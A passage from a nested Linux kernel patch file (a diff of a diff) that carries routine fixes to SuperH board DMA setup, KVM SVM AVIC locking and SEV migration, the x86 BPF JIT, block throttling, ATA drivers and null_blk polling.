+ 	platform_device_add(ecovec_ceu_devices[0]);
+ 
+ 	device_initialize(&ecovec_ceu_devices[1]->dev);
+ 	dma_declare_coherent_memory(&ecovec_ceu_devices[1]->dev,
+ 				    ceu1_dma_membase, ceu1_dma_membase,
+-				    ceu1_dma_membase +
+-				    CEU_BUFFER_MEMORY_SIZE - 1);
++				    CEU_BUFFER_MEMORY_SIZE);
+ 	platform_device_add(ecovec_ceu_devices[1]);
+ 
+ 	gpiod_add_lookup_table(&cn12_power_gpiod_table);
+diff --git a/arch/sh/boards/mach-kfr2r09/setup.c b/arch/sh/boards/mach-kfr2r09/setup.c
+index 20f4db778ed6a..c6d556dfbbbe6 100644
+--- a/arch/sh/boards/mach-kfr2r09/setup.c
++++ b/arch/sh/boards/mach-kfr2r09/setup.c
+@@ -603,7 +603,7 @@ static int __init kfr2r09_devices_setup(void)
+ 	device_initialize(&kfr2r09_ceu_device.dev);
+ 	dma_declare_coherent_memory(&kfr2r09_ceu_device.dev,
+ 			ceu_dma_membase, ceu_dma_membase,
+-			ceu_dma_membase + CEU_BUFFER_MEMORY_SIZE - 1);
++			CEU_BUFFER_MEMORY_SIZE);
+ 
+ 	platform_device_add(&kfr2r09_ceu_device);
+ 
+diff --git a/arch/sh/boards/mach-migor/setup.c b/arch/sh/boards/mach-migor/setup.c
+index f60061283c482..773ee767d0c4e 100644
+--- a/arch/sh/boards/mach-migor/setup.c
++++ b/arch/sh/boards/mach-migor/setup.c
+@@ -604,7 +604,7 @@ static int __init migor_devices_setup(void)
+ 	device_initialize(&migor_ceu_device.dev);
+ 	dma_declare_coherent_memory(&migor_ceu_device.dev,
+ 			ceu_dma_membase, ceu_dma_membase,
+-			ceu_dma_membase + CEU_BUFFER_MEMORY_SIZE - 1);
++			CEU_BUFFER_MEMORY_SIZE);
+ 
+ 	platform_device_add(&migor_ceu_device);
+ 
+diff --git a/arch/sh/boards/mach-se/7724/setup.c b/arch/sh/boards/mach-se/7724/setup.c
+index b60a2626e18b2..6495f93540654 100644
+--- a/arch/sh/boards/mach-se/7724/setup.c
++++ b/arch/sh/boards/mach-se/7724/setup.c
+@@ -940,15 +940,13 @@ static int __init devices_setup(void)
+ 	device_initialize(&ms7724se_ceu_devices[0]->dev);
+ 	dma_declare_coherent_memory(&ms7724se_ceu_devices[0]->dev,
+ 				    ceu0_dma_membase, ceu0_dma_membase,
+-				    ceu0_dma_membase +
+-				    CEU_BUFFER_MEMORY_SIZE - 1);
++				    CEU_BUFFER_MEMORY_SIZE);
+ 	platform_device_add(ms7724se_ceu_devices[0]);
+ 
+ 	device_initialize(&ms7724se_ceu_devices[1]->dev);
+ 	dma_declare_coherent_memory(&ms7724se_ceu_devices[1]->dev,
+ 				    ceu1_dma_membase, ceu1_dma_membase,
+-				    ceu1_dma_membase +
+-				    CEU_BUFFER_MEMORY_SIZE - 1);
++				    CEU_BUFFER_MEMORY_SIZE);
+ 	platform_device_add(ms7724se_ceu_devices[1]);
+ 
+ 	return platform_add_devices(ms7724se_devices,
+diff --git a/arch/x86/include/asm/virtext.h b/arch/x86/include/asm/virtext.h
+index 3b12e6b994123..6c2e3ff3cb28f 100644
+--- a/arch/x86/include/asm/virtext.h
++++ b/arch/x86/include/asm/virtext.h
+@@ -101,12 +101,6 @@ static inline int cpu_has_svm(const char **msg)
+ 		return 0;
+ 	}
+ 
+-	if (boot_cpu_data.extended_cpuid_level < SVM_CPUID_FUNC) {
+-		if (msg)
+-			*msg = "can't execute cpuid_8000000a";
+-		return 0;
+-	}
+-
+ 	if (!boot_cpu_has(X86_FEATURE_SVM)) {
+ 		if (msg)
+ 			*msg = "svm not available";
+diff --git a/arch/x86/kvm/svm/avic.c b/arch/x86/kvm/svm/avic.c
+index e910ec5a0cc0b..d3e66740c7c68 100644
+--- a/arch/x86/kvm/svm/avic.c
++++ b/arch/x86/kvm/svm/avic.c
+@@ -810,6 +810,7 @@ static int svm_ir_list_add(struct vcpu_svm *svm, struct amd_iommu_pi_data *pi)
+ 	int ret = 0;
+ 	unsigned long flags;
+ 	struct amd_svm_iommu_ir *ir;
++	u64 entry;
+ 
+ 	/**
+ 	 * In some cases, the existing irte is updated and re-set,
+@@ -843,6 +844,18 @@ static int svm_ir_list_add(struct vcpu_svm *svm, struct amd_iommu_pi_data *pi)
+ 	ir->data = pi->ir_data;
+ 
+ 	spin_lock_irqsave(&svm->ir_list_lock, flags);
++
++	/*
++	 * Update the target pCPU for IOMMU doorbells if the vCPU is running.
++	 * If the vCPU is NOT running, i.e. is blocking or scheduled out, KVM
++	 * will update the pCPU info when the vCPU is awakened and/or scheduled in.
++	 * See also avic_vcpu_load().
++	 */
++	entry = READ_ONCE(*(svm->avic_physical_id_cache));
++	if (entry & AVIC_PHYSICAL_ID_ENTRY_IS_RUNNING_MASK)
++		amd_iommu_update_ga(entry & AVIC_PHYSICAL_ID_ENTRY_HOST_PHYSICAL_ID_MASK,
++				    true, pi->ir_data);
++
+ 	list_add(&ir->node, &svm->ir_list);
+ 	spin_unlock_irqrestore(&svm->ir_list_lock, flags);
+ out:
+@@ -1022,10 +1035,11 @@ static inline int
+ avic_update_iommu_vcpu_affinity(struct kvm_vcpu *vcpu, int cpu, bool r)
+ {
+ 	int ret = 0;
+-	unsigned long flags;
+ 	struct amd_svm_iommu_ir *ir;
+ 	struct vcpu_svm *svm = to_svm(vcpu);
+ 
++	lockdep_assert_held(&svm->ir_list_lock);
++
+ 	if (!kvm_arch_has_assigned_device(vcpu->kvm))
+ 		return 0;
+ 
+@@ -1033,19 +1047,15 @@ avic_update_iommu_vcpu_affinity(struct kvm_vcpu *vcpu, int cpu, bool r)
+ 	 * Here, we go through the per-vcpu ir_list to update all existing
+ 	 * interrupt remapping table entry targeting this vcpu.
+ 	 */
+-	spin_lock_irqsave(&svm->ir_list_lock, flags);
+-
+ 	if (list_empty(&svm->ir_list))
+-		goto out;
++		return 0;
+ 
+ 	list_for_each_entry(ir, &svm->ir_list, node) {
+ 		ret = amd_iommu_update_ga(cpu, r, ir->data);
+ 		if (ret)
+-			break;
++			return ret;
+ 	}
+-out:
+-	spin_unlock_irqrestore(&svm->ir_list_lock, flags);
+-	return ret;
++	return 0;
+ }
+ 
+ void avic_vcpu_load(struct kvm_vcpu *vcpu, int cpu)
+@@ -1053,6 +1063,7 @@ void avic_vcpu_load(struct kvm_vcpu *vcpu, int cpu)
+ 	u64 entry;
+ 	int h_physical_id = kvm_cpu_get_apicid(cpu);
+ 	struct vcpu_svm *svm = to_svm(vcpu);
++	unsigned long flags;
+ 
+ 	lockdep_assert_preemption_disabled();
+ 
+@@ -1069,6 +1080,15 @@ void avic_vcpu_load(struct kvm_vcpu *vcpu, int cpu)
+ 	if (kvm_vcpu_is_blocking(vcpu))
+ 		return;
+ 
++	/*
++	 * Grab the per-vCPU interrupt remapping lock even if the VM doesn't
++	 * _currently_ have assigned devices, as that can change.  Holding
++	 * ir_list_lock ensures that either svm_ir_list_add() will consume
++	 * up-to-date entry information, or that this task will wait until
++	 * svm_ir_list_add() completes to set the new target pCPU.
++	 */
++	spin_lock_irqsave(&svm->ir_list_lock, flags);
++
+ 	entry = READ_ONCE(*(svm->avic_physical_id_cache));
+ 
+ 	entry &= ~AVIC_PHYSICAL_ID_ENTRY_HOST_PHYSICAL_ID_MASK;
+@@ -1077,25 +1097,48 @@ void avic_vcpu_load(struct kvm_vcpu *vcpu, int cpu)
+ 
+ 	WRITE_ONCE(*(svm->avic_physical_id_cache), entry);
+ 	avic_update_iommu_vcpu_affinity(vcpu, h_physical_id, true);
++
++	spin_unlock_irqrestore(&svm->ir_list_lock, flags);
+ }
+ 
+ void avic_vcpu_put(struct kvm_vcpu *vcpu)
+ {
+ 	u64 entry;
+ 	struct vcpu_svm *svm = to_svm(vcpu);
++	unsigned long flags;
+ 
+ 	lockdep_assert_preemption_disabled();
+ 
++	/*
++	 * Note, reading the Physical ID entry outside of ir_list_lock is safe
++	 * as only the pCPU that has loaded (or is loading) the vCPU is allowed
++	 * to modify the entry, and preemption is disabled.  I.e. the vCPU
++	 * can't be scheduled out and thus avic_vcpu_{put,load}() can't run
++	 * recursively.
++	 */
+ 	entry = READ_ONCE(*(svm->avic_physical_id_cache));
+ 
+ 	/* Nothing to do if IsRunning == '0' due to vCPU blocking. */
+ 	if (!(entry & AVIC_PHYSICAL_ID_ENTRY_IS_RUNNING_MASK))
+ 		return;
+ 
++	/*
++	 * Take and hold the per-vCPU interrupt remapping lock while updating
++	 * the Physical ID entry even though the lock doesn't protect against
++	 * multiple writers (see above).  Holding ir_list_lock ensures that
++	 * either svm_ir_list_add() will consume up-to-date entry information,
++	 * or that this task will wait until svm_ir_list_add() completes to
++	 * mark the vCPU as not running.
++	 */
++	spin_lock_irqsave(&svm->ir_list_lock, flags);
++
+ 	avic_update_iommu_vcpu_affinity(vcpu, -1, 0);
+ 
+ 	entry &= ~AVIC_PHYSICAL_ID_ENTRY_IS_RUNNING_MASK;
+ 	WRITE_ONCE(*(svm->avic_physical_id_cache), entry);
++
++	spin_unlock_irqrestore(&svm->ir_list_lock, flags);
++
+ }
+ 
+ void avic_refresh_virtual_apic_mode(struct kvm_vcpu *vcpu)
+diff --git a/arch/x86/kvm/svm/nested.c b/arch/x86/kvm/svm/nested.c
+index 92268645a5fed..8053974af326c 100644
+--- a/arch/x86/kvm/svm/nested.c
++++ b/arch/x86/kvm/svm/nested.c
+@@ -660,10 +660,9 @@ static void nested_vmcb02_prepare_control(struct vcpu_svm *svm,
+ 
+ 	vmcb02->control.tsc_offset = vcpu->arch.tsc_offset;
+ 
+-	if (svm->tsc_ratio_msr != kvm_caps.default_tsc_scaling_ratio) {
+-		WARN_ON(!svm->tsc_scaling_enabled);
++	if (svm->tsc_scaling_enabled &&
++	    svm->tsc_ratio_msr != kvm_caps.default_tsc_scaling_ratio)
+ 		nested_svm_update_tsc_ratio_msr(vcpu);
+-	}
+ 
+ 	vmcb02->control.int_ctl             =
+ 		(svm->nested.ctl.int_ctl & int_ctl_vmcb12_bits) |
+@@ -1022,8 +1021,8 @@ int nested_svm_vmexit(struct vcpu_svm *svm)
+ 		vmcb_mark_dirty(vmcb01, VMCB_INTERCEPTS);
+ 	}
+ 
+-	if (svm->tsc_ratio_msr != kvm_caps.default_tsc_scaling_ratio) {
+-		WARN_ON(!svm->tsc_scaling_enabled);
++	if (kvm_caps.has_tsc_control &&
++	    vcpu->arch.tsc_scaling_ratio != vcpu->arch.l1_tsc_scaling_ratio) {
+ 		vcpu->arch.tsc_scaling_ratio = vcpu->arch.l1_tsc_scaling_ratio;
+ 		__svm_write_tsc_multiplier(vcpu->arch.tsc_scaling_ratio);
+ 	}
+diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c
+index e0437acb5cf75..d08d5e085649f 100644
+--- a/arch/x86/kvm/svm/sev.c
++++ b/arch/x86/kvm/svm/sev.c
+@@ -1723,7 +1723,7 @@ static void sev_migrate_from(struct kvm *dst_kvm, struct kvm *src_kvm)
+ 		 * Note, the source is not required to have the same number of
+ 		 * vCPUs as the destination when migrating a vanilla SEV VM.
+ 		 */
+-		src_vcpu = kvm_get_vcpu(dst_kvm, i);
++		src_vcpu = kvm_get_vcpu(src_kvm, i);
+ 		src_svm = to_svm(src_vcpu);
+ 
+ 		/*
+@@ -2951,9 +2951,12 @@ static void sev_es_init_vmcb(struct vcpu_svm *svm)
+ 	/*
+ 	 * An SEV-ES guest requires a VMSA area that is a separate from the
+ 	 * VMCB page. Do not include the encryption mask on the VMSA physical
+-	 * address since hardware will access it using the guest key.
++	 * address since hardware will access it using the guest key.  Note,
++	 * the VMSA will be NULL if this vCPU is the destination for intrahost
++	 * migration, and will be copied later.
+ 	 */
+-	svm->vmcb->control.vmsa_pa = __pa(svm->sev_es.vmsa);
++	if (svm->sev_es.vmsa)
++		svm->vmcb->control.vmsa_pa = __pa(svm->sev_es.vmsa);
+ 
+ 	/* Can't intercept CR register access, HV can't modify CR registers */
+ 	svm_clr_intercept(svm, INTERCEPT_CR0_READ);
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index a96f9a17e8b5d..7e4d66be18ef5 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -366,6 +366,8 @@ static void svm_set_interrupt_shadow(struct kvm_vcpu *vcpu, int mask)
+ 		svm->vmcb->control.int_state |= SVM_INTERRUPT_SHADOW_MASK;
+ 
+ }
++static bool svm_can_emulate_instruction(struct kvm_vcpu *vcpu, int emul_type,
++					void *insn, int insn_len);
+ 
+ static int __svm_skip_emulated_instruction(struct kvm_vcpu *vcpu,
+ 					   bool commit_side_effects)
+@@ -386,6 +388,14 @@ static int __svm_skip_emulated_instruction(struct kvm_vcpu *vcpu,
+ 	}
+ 
+ 	if (!svm->next_rip) {
++		/*
++		 * FIXME: Drop this when kvm_emulate_instruction() does the
++		 * right thing and treats "can't emulate" as outright failure
++		 * for EMULTYPE_SKIP.
++		 */
++		if (!svm_can_emulate_instruction(vcpu, EMULTYPE_SKIP, NULL, 0))
++			return 0;
++
+ 		if (unlikely(!commit_side_effects))
+ 			old_rflags = svm->vmcb->save.rflags;
+ 
+@@ -4592,16 +4602,25 @@ static bool svm_can_emulate_instruction(struct kvm_vcpu *vcpu, int emul_type,
+ 	 * and cannot be decrypted by KVM, i.e. KVM would read cyphertext and
+ 	 * decode garbage.
+ 	 *
+-	 * Inject #UD if KVM reached this point without an instruction buffer.
+-	 * In practice, this path should never be hit by a well-behaved guest,
+-	 * e.g. KVM doesn't intercept #UD or #GP for SEV guests, but this path
+-	 * is still theoretically reachable, e.g. via unaccelerated fault-like
+-	 * AVIC access, and needs to be handled by KVM to avoid putting the
+-	 * guest into an infinite loop.   Injecting #UD is somewhat arbitrary,
+-	 * but its the least awful option given lack of insight into the guest.
++	 * If KVM is NOT trying to simply skip an instruction, inject #UD if
++	 * KVM reached this point without an instruction buffer.  In practice,
++	 * this path should never be hit by a well-behaved guest, e.g. KVM
++	 * doesn't intercept #UD or #GP for SEV guests, but this path is still
++	 * theoretically reachable, e.g. via unaccelerated fault-like AVIC
++	 * access, and needs to be handled by KVM to avoid putting the guest
++	 * into an infinite loop.   Injecting #UD is somewhat arbitrary, but
++	 * its the least awful option given lack of insight into the guest.
++	 *
++	 * If KVM is trying to skip an instruction, simply resume the guest.
++	 * If a #NPF occurs while the guest is vectoring an INT3/INTO, then KVM
++	 * will attempt to re-inject the INT3/INTO and skip the instruction.
++	 * In that scenario, retrying the INT3/INTO and hoping the guest will
++	 * make forward progress is the only option that has a chance of
++	 * success (and in practice it will work the vast majority of the time).
+ 	 */
+ 	if (unlikely(!insn)) {
+-		kvm_queue_exception(vcpu, UD_VECTOR);
++		if (!(emul_type & EMULTYPE_SKIP))
++			kvm_queue_exception(vcpu, UD_VECTOR);
+ 		return false;
+ 	}
+ 
+diff --git a/arch/x86/net/bpf_jit_comp.c b/arch/x86/net/bpf_jit_comp.c
+index db6053a22e866..5e680e039d0e1 100644
+--- a/arch/x86/net/bpf_jit_comp.c
++++ b/arch/x86/net/bpf_jit_comp.c
+@@ -1813,10 +1813,6 @@ static int invoke_bpf_prog(const struct btf_func_model *m, u8 **pprog,
+ 			   struct bpf_tramp_link *l, int stack_size,
+ 			   int run_ctx_off, bool save_ret)
+ {
+-	void (*exit)(struct bpf_prog *prog, u64 start,
+-		     struct bpf_tramp_run_ctx *run_ctx) = __bpf_prog_exit;
+-	u64 (*enter)(struct bpf_prog *prog,
+-		     struct bpf_tramp_run_ctx *run_ctx) = __bpf_prog_enter;
+ 	u8 *prog = *pprog;
+ 	u8 *jmp_insn;
+ 	int ctx_cookie_off = offsetof(struct bpf_tramp_run_ctx, bpf_cookie);
+@@ -1835,23 +1831,12 @@ static int invoke_bpf_prog(const struct btf_func_model *m, u8 **pprog,
+ 	 */
+ 	emit_stx(&prog, BPF_DW, BPF_REG_FP, BPF_REG_1, -run_ctx_off + ctx_cookie_off);
+ 
+-	if (p->aux->sleepable) {
+-		enter = __bpf_prog_enter_sleepable;
+-		exit = __bpf_prog_exit_sleepable;
+-	} else if (p->type == BPF_PROG_TYPE_STRUCT_OPS) {
+-		enter = __bpf_prog_enter_struct_ops;
+-		exit = __bpf_prog_exit_struct_ops;
+-	} else if (p->expected_attach_type == BPF_LSM_CGROUP) {
+-		enter = __bpf_prog_enter_lsm_cgroup;
+-		exit = __bpf_prog_exit_lsm_cgroup;
+-	}
+-
+ 	/* arg1: mov rdi, progs[i] */
+ 	emit_mov_imm64(&prog, BPF_REG_1, (long) p >> 32, (u32) (long) p);
+ 	/* arg2: lea rsi, [rbp - ctx_cookie_off] */
+ 	EMIT4(0x48, 0x8D, 0x75, -run_ctx_off);
+ 
+-	if (emit_call(&prog, enter, prog))
++	if (emit_call(&prog, bpf_trampoline_enter(p), prog))
+ 		return -EINVAL;
+ 	/* remember prog start time returned by __bpf_prog_enter */
+ 	emit_mov_reg(&prog, true, BPF_REG_6, BPF_REG_0);
+@@ -1896,7 +1881,7 @@ static int invoke_bpf_prog(const struct btf_func_model *m, u8 **pprog,
+ 	emit_mov_reg(&prog, true, BPF_REG_2, BPF_REG_6);
+ 	/* arg3: lea rdx, [rbp - run_ctx_off] */
+ 	EMIT4(0x48, 0x8D, 0x55, -run_ctx_off);
+-	if (emit_call(&prog, exit, prog))
++	if (emit_call(&prog, bpf_trampoline_exit(p), prog))
+ 		return -EINVAL;
+ 
+ 	*pprog = prog;
+diff --git a/block/blk-throttle.c b/block/blk-throttle.c
+index f1bc600c4ded6..1007f80278579 100644
+--- a/block/blk-throttle.c
++++ b/block/blk-throttle.c
+@@ -697,11 +697,41 @@ static bool throtl_slice_used(struct throtl_grp *tg, bool rw)
+ 	return true;
+ }
+ 
++static unsigned int calculate_io_allowed(u32 iops_limit,
++					 unsigned long jiffy_elapsed)
++{
++	unsigned int io_allowed;
++	u64 tmp;
++
++	/*
++	 * jiffy_elapsed should not be a big value as minimum iops can be
++	 * 1 then at max jiffy elapsed should be equivalent of 1 second as we
++	 * will allow dispatch after 1 second and after that slice should
++	 * have been trimmed.
++	 */
++
++	tmp = (u64)iops_limit * jiffy_elapsed;
++	do_div(tmp, HZ);
++
++	if (tmp > UINT_MAX)
++		io_allowed = UINT_MAX;
++	else
++		io_allowed = tmp;
++
++	return io_allowed;
++}
++
++static u64 calculate_bytes_allowed(u64 bps_limit, unsigned long jiffy_elapsed)
++{
++	return mul_u64_u64_div_u64(bps_limit, (u64)jiffy_elapsed, (u64)HZ);
++}
++
+ /* Trim the used slices and adjust slice start accordingly */
+ static inline void throtl_trim_slice(struct throtl_grp *tg, bool rw)
+ {
+-	unsigned long nr_slices, time_elapsed, io_trim;
+-	u64 bytes_trim, tmp;
++	unsigned long time_elapsed;
++	long long bytes_trim;
++	int io_trim;
+ 
+ 	BUG_ON(time_before(tg->slice_end[rw], tg->slice_start[rw]));
+ 
+@@ -723,67 +753,38 @@ static inline void throtl_trim_slice(struct throtl_grp *tg, bool rw)
+ 
+ 	throtl_set_slice_end(tg, rw, jiffies + tg->td->throtl_slice);
+ 
+-	time_elapsed = jiffies - tg->slice_start[rw];
+-
+-	nr_slices = time_elapsed / tg->td->throtl_slice;
+-
+-	if (!nr_slices)
++	time_elapsed = rounddown(jiffies - tg->slice_start[rw],
++				 tg->td->throtl_slice);
++	if (!time_elapsed)
+ 		return;
+-	tmp = tg_bps_limit(tg, rw) * tg->td->throtl_slice * nr_slices;
+-	do_div(tmp, HZ);
+-	bytes_trim = tmp;
+ 
+-	io_trim = (tg_iops_limit(tg, rw) * tg->td->throtl_slice * nr_slices) /
+-		HZ;
+-
+-	if (!bytes_trim && !io_trim)
++	bytes_trim = calculate_bytes_allowed(tg_bps_limit(tg, rw),
++					     time_elapsed) +
++		     tg->carryover_bytes[rw];
++	io_trim = calculate_io_allowed(tg_iops_limit(tg, rw), time_elapsed) +
++		  tg->carryover_ios[rw];
++	if (bytes_trim <= 0 && io_trim <= 0)
+ 		return;
+ 
+-	if (tg->bytes_disp[rw] >= bytes_trim)
++	tg->carryover_bytes[rw] = 0;
++	if ((long long)tg->bytes_disp[rw] >= bytes_trim)
+ 		tg->bytes_disp[rw] -= bytes_trim;
+ 	else
+ 		tg->bytes_disp[rw] = 0;
+ 
+-	if (tg->io_disp[rw] >= io_trim)
++	tg->carryover_ios[rw] = 0;
++	if ((int)tg->io_disp[rw] >= io_trim)
+ 		tg->io_disp[rw] -= io_trim;
+ 	else
+ 		tg->io_disp[rw] = 0;
+ 
+-	tg->slice_start[rw] += nr_slices * tg->td->throtl_slice;
++	tg->slice_start[rw] += time_elapsed;
+ 
+ 	throtl_log(&tg->service_queue,
+-		   "[%c] trim slice nr=%lu bytes=%llu io=%lu start=%lu end=%lu jiffies=%lu",
+-		   rw == READ ? 'R' : 'W', nr_slices, bytes_trim, io_trim,
+-		   tg->slice_start[rw], tg->slice_end[rw], jiffies);
+-}
+-
+-static unsigned int calculate_io_allowed(u32 iops_limit,
+-					 unsigned long jiffy_elapsed)
+-{
+-	unsigned int io_allowed;
+-	u64 tmp;
+-
+-	/*
+-	 * jiffy_elapsed should not be a big value as minimum iops can be
+-	 * 1 then at max jiffy elapsed should be equivalent of 1 second as we
+-	 * will allow dispatch after 1 second and after that slice should
+-	 * have been trimmed.
+-	 */
+-
+-	tmp = (u64)iops_limit * jiffy_elapsed;
+-	do_div(tmp, HZ);
+-
+-	if (tmp > UINT_MAX)
+-		io_allowed = UINT_MAX;
+-	else
+-		io_allowed = tmp;
+-
+-	return io_allowed;
+-}
+-
+-static u64 calculate_bytes_allowed(u64 bps_limit, unsigned long jiffy_elapsed)
+-{
+-	return mul_u64_u64_div_u64(bps_limit, (u64)jiffy_elapsed, (u64)HZ);
++		   "[%c] trim slice nr=%lu bytes=%lld io=%d start=%lu end=%lu jiffies=%lu",
++		   rw == READ ? 'R' : 'W', time_elapsed / tg->td->throtl_slice,
++		   bytes_trim, io_trim, tg->slice_start[rw], tg->slice_end[rw],
++		   jiffies);
+ }
+ 
+ static void __tg_update_carryover(struct throtl_grp *tg, bool rw)
+diff --git a/drivers/ata/ahci.c b/drivers/ata/ahci.c
+index 53ab2306da009..1645335b8d2df 100644
+--- a/drivers/ata/ahci.c
++++ b/drivers/ata/ahci.c
+@@ -422,6 +422,8 @@ static const struct pci_device_id ahci_pci_tbl[] = {
+ 	{ PCI_VDEVICE(INTEL, 0x34d3), board_ahci_low_power }, /* Ice Lake LP AHCI */
+ 	{ PCI_VDEVICE(INTEL, 0x02d3), board_ahci_low_power }, /* Comet Lake PCH-U AHCI */
+ 	{ PCI_VDEVICE(INTEL, 0x02d7), board_ahci_low_power }, /* Comet Lake PCH RAID */
++	/* Elkhart Lake IDs 0x4b60 & 0x4b62 https://sata-io.org/product/8803 not tested yet */
++	{ PCI_VDEVICE(INTEL, 0x4b63), board_ahci_low_power }, /* Elkhart Lake AHCI */
+ 
+ 	/* JMicron 360/1/3/5/6, match class to avoid IDE function */
+ 	{ PCI_VENDOR_ID_JMICRON, PCI_ANY_ID, PCI_ANY_ID, PCI_ANY_ID,
+diff --git a/drivers/ata/pata_falcon.c b/drivers/ata/pata_falcon.c
+index 823c88622e34a..ffdd12e722c99 100644
+--- a/drivers/ata/pata_falcon.c
++++ b/drivers/ata/pata_falcon.c
+@@ -123,8 +123,8 @@ static int __init pata_falcon_init_one(struct platform_device *pdev)
+ 	struct resource *base_res, *ctl_res, *irq_res;
+ 	struct ata_host *host;
+ 	struct ata_port *ap;
+-	void __iomem *base;
+-	int irq = 0;
++	void __iomem *base, *ctl_base;
++	int irq = 0, io_offset = 1, reg_shift = 2; /* Falcon defaults */
+ 
+ 	dev_info(&pdev->dev, "Atari Falcon and Q40/Q60 PATA controller\n");
+ 
+@@ -165,26 +165,34 @@ static int __init pata_falcon_init_one(struct platform_device *pdev)
+ 	ap->pio_mask = ATA_PIO4;
+ 	ap->flags |= ATA_FLAG_SLAVE_POSS | ATA_FLAG_NO_IORDY;
+ 
+-	base = (void __iomem *)base_mem_res->start;
+ 	/* N.B. this assumes data_addr will be used for word-sized I/O only */
+-	ap->ioaddr.data_addr		= base + 0 + 0 * 4;
+-	ap->ioaddr.error_addr		= base + 1 + 1 * 4;
+-	ap->ioaddr.feature_addr		= base + 1 + 1 * 4;
+-	ap->ioaddr.nsect_addr		= base + 1 + 2 * 4;
+-	ap->ioaddr.lbal_addr		= base + 1 + 3 * 4;
+-	ap->ioaddr.lbam_addr		= base + 1 + 4 * 4;
+-	ap->ioaddr.lbah_addr		= base + 1 + 5 * 4;
+-	ap->ioaddr.device_addr		= base + 1 + 6 * 4;
+-	ap->ioaddr.status_addr		= base + 1 + 7 * 4;
+-	ap->ioaddr.command_addr		= base + 1 + 7 * 4;
+-
+-	base = (void __iomem *)ctl_mem_res->start;
+-	ap->ioaddr.altstatus_addr	= base + 1;
+-	ap->ioaddr.ctl_addr		= base + 1;
+-
+-	ata_port_desc(ap, "cmd 0x%lx ctl 0x%lx",
+-		      (unsigned long)base_mem_res->start,
+-		      (unsigned long)ctl_mem_res->start);
++	ap->ioaddr.data_addr = (void __iomem *)base_mem_res->start;
++
++	if (base_res) {		/* only Q40 has IO resources */
++		io_offset = 0x10000;
++		reg_shift = 0;
++		base = (void __iomem *)base_res->start;
++		ctl_base = (void __iomem *)ctl_res->start;
++	} else {
++		base = (void __iomem *)base_mem_res->start;
++		ctl_base = (void __iomem *)ctl_mem_res->start;
++	}
++
++	ap->ioaddr.error_addr	= base + io_offset + (1 << reg_shift);
++	ap->ioaddr.feature_addr	= base + io_offset + (1 << reg_shift);
++	ap->ioaddr.nsect_addr	= base + io_offset + (2 << reg_shift);
++	ap->ioaddr.lbal_addr	= base + io_offset + (3 << reg_shift);
++	ap->ioaddr.lbam_addr	= base + io_offset + (4 << reg_shift);
++	ap->ioaddr.lbah_addr	= base + io_offset + (5 << reg_shift);
++	ap->ioaddr.device_addr	= base + io_offset + (6 << reg_shift);
++	ap->ioaddr.status_addr	= base + io_offset + (7 << reg_shift);
++	ap->ioaddr.command_addr	= base + io_offset + (7 << reg_shift);
++
++	ap->ioaddr.altstatus_addr	= ctl_base + io_offset;
++	ap->ioaddr.ctl_addr		= ctl_base + io_offset;
++
++	ata_port_desc(ap, "cmd %px ctl %px data %px",
++		      base, ctl_base, ap->ioaddr.data_addr);
+ 
+ 	irq_res = platform_get_resource(pdev, IORESOURCE_IRQ, 0);
+ 	if (irq_res && irq_res->start > 0) {
+diff --git a/drivers/ata/pata_ftide010.c b/drivers/ata/pata_ftide010.c
+index 0117df0fe3c59..092ba6f87aa31 100644
+--- a/drivers/ata/pata_ftide010.c
++++ b/drivers/ata/pata_ftide010.c
+@@ -567,6 +567,7 @@ static struct platform_driver pata_ftide010_driver = {
+ };
+ module_platform_driver(pata_ftide010_driver);
+ 
++MODULE_DESCRIPTION("low level driver for Faraday Technology FTIDE010");
+ MODULE_AUTHOR("Linus Walleij <linus.walleij@linaro.org>");
+ MODULE_LICENSE("GPL");
+ MODULE_ALIAS("platform:" DRV_NAME);
+diff --git a/drivers/ata/sata_gemini.c b/drivers/ata/sata_gemini.c
+index b729e9919bb0c..c96fcf9ee3c07 100644
+--- a/drivers/ata/sata_gemini.c
++++ b/drivers/ata/sata_gemini.c
+@@ -428,6 +428,7 @@ static struct platform_driver gemini_sata_driver = {
+ };
+ module_platform_driver(gemini_sata_driver);
+ 
++MODULE_DESCRIPTION("low level driver for Cortina Systems Gemini SATA bridge");
+ MODULE_AUTHOR("Linus Walleij <linus.walleij@linaro.org>");
+ MODULE_LICENSE("GPL");
+ MODULE_ALIAS("platform:" DRV_NAME);
+diff --git a/drivers/block/null_blk/main.c b/drivers/block/null_blk/main.c
+index e8cb914223cdf..e9f38eba2f133 100644
+--- a/drivers/block/null_blk/main.c
++++ b/drivers/block/null_blk/main.c
+@@ -1585,9 +1585,12 @@ static int null_poll(struct blk_mq_hw_ctx *hctx, struct io_comp_batch *iob)
+ 	struct nullb_queue *nq = hctx->driver_data;
+ 	LIST_HEAD(list);
+ 	int nr = 0;
++	struct request *rq;
+ 
+ 	spin_lock(&nq->poll_lock);
+ 	list_splice_init(&nq->poll_list, &list);
++	list_for_each_entry(rq, &list, queuelist)
++		blk_mq_set_request_complete(rq);
+ 	spin_unlock(&nq->poll_lock);
+ 
+ 	while (!list_empty(&list)) {
+@@ -1613,16 +1616,21 @@ static enum blk_eh_timer_return null_timeout_rq(struct request *rq)
+ 	struct blk_mq_hw_ctx *hctx = rq->mq_hctx;
+ 	struct nullb_cmd *cmd = blk_mq_rq_to_pdu(rq);
+ 
+-	pr_info("rq %p timed out\n", rq);
+-
+ 	if (hctx->type == HCTX_TYPE_POLL) {
+ 		struct nullb_queue *nq = hctx->driver_data;
+ 
+ 		spin_lock(&nq->poll_lock);
++		/* The request may have completed meanwhile. */
++		if (blk_mq_request_completed(rq)) {
++			spin_unlock(&nq->poll_lock);
++			return BLK_EH_DONE;
++		}
+ 		list_del_init(&rq->queuelist);
+ 		spin_unlock(&nq->poll_lock);
+ 	}
+ 
++	pr_info("rq %p timed out\n", rq);
++
+ 	/*
+ 	 * If the device is marked as blocking (i.e. memory backed or zoned
+ 	 * device), the submission path may be blocked waiting for resources
+diff --git a/drivers/bus/mhi/host/pm.c b/drivers/bus/mhi/host/pm.c
+index 083459028a4b8..8a4362d75fc43 100644
+--- a/drivers/bus/mhi/host/pm.c
++++ b/drivers/bus/mhi/host/pm.c
+@@ -470,6 +470,10 @@ static void mhi_pm_disable_transition(struct mhi_controller *mhi_cntrl)
+ 
+ 	/* Trigger MHI RESET so that the device will not access host memory */
